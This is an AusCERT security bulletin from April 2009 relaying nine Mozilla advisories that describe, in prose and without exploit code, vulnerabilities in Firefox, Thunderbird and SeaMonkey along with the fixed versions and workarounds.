Date: 23 April 2009
References: ESB-2009.0391 ESB-2009.0454
Click here for printable version
Click here for PGP verifiable version
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
A U S C E R T A L E R T
AL-2009.0035 -- AUSCERT ALERT
[Win][UNIX/Linux]
Firefox, Seamonkey and Thunderbird: Execute Arbitrary Code
23 April 2009
===========================================================================
AusCERT Alert Summary
---------------------
Product: Firefox 3.0.8
Thunderbird 2.0.21
Seamonkey 1.1.16
Operating System: UNIX variants (UNIX, Linux, OSX)
Windows
Impact: Execute Arbitrary Code/Commands
Access Privileged Data
Create Arbitrary Files
Cross-site Scripting
Cross-site Request Forgery
Provide Misleading Information
Access: Remote/Unauthenticated
CVE Names: CVE-2009-1302 CVE-2009-1303 CVE-2009-1304
CVE-2009-1305 CVE-2009-1306 CVE-2009-1307
CVE-2009-1308 CVE-2009-1309 CVE-2009-1310
CVE-2009-1311 CVE-2009-1312
Member content until: Thursday, May 21 2009
- --------------------------BEGIN INCLUDED TEXT--------------------
OVERVIEW:
Mozilla has released nine advisories relating to Firefox, Thunderbird
and Seamonkey. Mozilla has rated one of these advisories as "Critical",
two as "High", two as "Moderate" and four as "Low" impact.
IMPACT:
According to Mozilla, the vulnerabilties corrected in this update
are:
o MFSA 2009-22 (CVE-2009-1312): "Mozilla community member Michael
reported that when a server responds with a Refresh header
containing a javascript: URI, Firefox will redirect to the
javascript: URI. If an attacker could inject a Refresh header into a
server response, or could control the value that a site places in
the Refresh header, they could use this vulnerability to perform an
XSS attack and execute arbitrary JavaScript within the context of
that site." [1]
o MFSA 2009-21 (CVE-2009-1311): "Developer and Mozilla community member
Paolo Amadini reported that when saving the inner frame of a web
page as a file when the outer page has POST data associated with it,
the POST data will be incorrectly sent to the URL of the inner frame.
This could potentially result in a user's sensitive data being sent
to a site for which it was not intended." [2]
o MFSA 2009-20 (CVE-2009-1310): "Security researcher Prateek Saxena
reported that a malicious MozSearch plugin could be created using a
javascript: URI in the SearchForm value. This URI is used as the
default landing page when an empty search is performed. If an
attacker could get a user to install the malicious plugin and
perform an empty search, the SearchForm javascript: URI would be
executed within the context of the currently open page." [3]
o MFSA 2009-19 (CVE-2009-1309): "Mozilla security researcher
moz_bug_r_a4 reported that it is possible to create a document whose
URI does not match the document's principal using XMLHttpRequest.
This type of mismatch leads to incorrect results in principal-based
security checks. An attacker could use this vulnerability to execute
arbitrary JavaScript within the context of another site.
moz_bug_r_a4 separately reported that
XPCNativeWrapper.toString's __proto__ comes from the wrong scope
which results in calls to that function being executed in the wrong
context in certain circumstances. An attacker could use this
vulnerability to run arbitrary code within the context of a
different site. Alternatively, if chrome were to call
content.toString.call(), then attacker-defined functions could be
run with chrome privileges.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail." [4]
o MFSA 2009-18 (CVE-2009-1308): "Web developer Cefn Hoile reported that
sites which allow users to embed third-party stylesheets are
vulnerable to script injection attacks using XBL bindings. While
this behavior was documented previously, it was determined that this
particular risk was not well-understood by some websites. To
mitigate this risk Mozilla added a restriction that requires XBL
bindings to come from the same origin as the bound document.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail." [5]
o MFSA 2009-17 (CVE-2009-1307): "Security researcher Gregory Fleischer
reported that when an Adobe Flash file is loaded via the
view-source: scheme, the Flash plugin misinterprets the origin of
the content as localhost, leading to two specific vulnerabilities:
1. The Flash file can bypass restrictions imposed by the
crossdomain.xml mechanism and initiate HTTP requests to arbitrary
third-party sites. This vulnerability could be used by an
attacker to perform CSRF attacks against these sites.
2. The Flash file, being treated as a local resource, can read and
write Local Shared Objects on a user's machine. This
vulnerability could be used by an attacker to place cookie-like
objects on a user's computer and track them across multiple sites.
Additonally, Fleischer reported that the jar: protocol could be used
to bypass restrictions normally preventing content loaded via
view-source: from being rendered.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if plugins were to be enabled in mail. This is
not the default setting and we strongly discourage users from
enabling plugins in mail." [6]
o MFSA 2009-16 (CVE-2009-1306): "Mozilla developer Daniel Veditz
reported that when the jar: scheme is used to wrap a URI which
serves the content with Content-Disposition: attachment, the HTTP
header is ignored and the content is unpacked and displayed inline.
A site may depend on this HTTP header to prevent potentially
untrusted content that it serves from executing within the context
of the site. An attacker could use this vulnerability to subvert
sites using this mechanism to mitigate content injection attacks.
This vulnerability has not been fixed on the Mozilla 1.8.1 branch,
which is used to build Firefox 2 and Thunderbird 2. However, note
that there are several mitigating factors which prevent easy
exploitation of this issue. In order for a website to be exploitable
it must:
1. Allow users to upload arbitrary content
2. Allow users to set arbitrary MIME types, or specifically
serve .jar files as application/java-archive or application/x-jar
3. Serve the .jar files from a domain containing sensitive content
which would otherwise be protected using
Content-Disposition: attachment" [7]
o MFSA 2009-15 (CVE-2009-0652): "Security researcher Moxie Marlinspike
reported that Unicode box drawing characters were allowed in
Internationalized Domain Names (IDN) where they could be visually
confused with punctuation used in valid web addresses. This could be
combined with a phishing-type scam to trick a victim into thinking
they were on a different website than they actually were." [8]
o MFSA 2009-14 (CVE-2009-1302,CVE-2009-1303,CVE-2009-1304,
CVE-2009-1305):
"Mozilla developers identified and fixed several stability bugs in
the browser engine used in Firefox and other Mozilla-based products.
Some of these crashes showed evidence of memory corruption under
certain circumstances and we presume that with enough effort at
least some of these could be exploited to run arbitrary code.
Note: Thunderbird shares the browser engine with Firefox and could
be vulnerable if JavaScript were to be enabled in mail. This
is not the default setting and we strongly discourage users
from running JavaScript in mail. Without further investigation
we cannot rule out the possibility that for some of these an
attacker might be able to prepare memory for exploitation
through some means other than JavaScript such as large images.
Workaround
Disable JavaScript until a version containing these fixes can be
installed." [9]
MITIGATION:
These vulnerabilities have been fixed in Firefox 3.0.9, Thunderbird
2.0.0.22 and SeaMonkey 1.1.17. At the time of this publication
updates for Thunderbird and SeaMonkey have not yet been released,
however Firefox 3.0.9 can be downloaded from the Mozilla web site.
REFERENCES:
[1] Mozilla Foundation Security Advisory 2009-22
http://www.mozilla.org/security/announce/2009/mfsa2009-22.html
[2] Mozilla Foundation Security Advisory 2009-21
http://www.mozilla.org/security/announce/2009/mfsa2009-21.html
[3] Mozilla Foundation Security Advisory 2009-20
http://www.mozilla.org/security/announce/2009/mfsa2009-20.html
[4] Mozilla Foundation Security Advisory 2009-19
http://www.mozilla.org/security/announce/2009/mfsa2009-19.html
[5] Mozilla Foundation Security Advisory 2009-18
http://www.mozilla.org/security/announce/2009/mfsa2009-18.html
[6] Mozilla Foundation Security Advisory 2009-17
http://www.mozilla.org/security/announce/2009/mfsa2009-17.html
[7] Mozilla Foundation Security Advisory 2009-16
http://www.mozilla.org/security/announce/2009/mfsa2009-16.html
[8] Mozilla Foundation Security Advisory 2009-15
http://www.mozilla.org/security/announce/2009/mfsa2009-15.html
[9] Mozilla Foundation Security Advisory 2009-14
http://www.mozilla.org/security/announce/2009/mfsa2009-14.html
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:
http://www.auscert.org.au/render.html?it=3192
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iD8DBQFJ78U0NVH5XJJInbgRAkU8AJ9Ki0pbxbjKeoiwe6O4wTJsh+aPkgCfellK
w8j4jptdrGKJzxrOG0U+eS4=
=u0Sl
-----END PGP SIGNATURE-----
|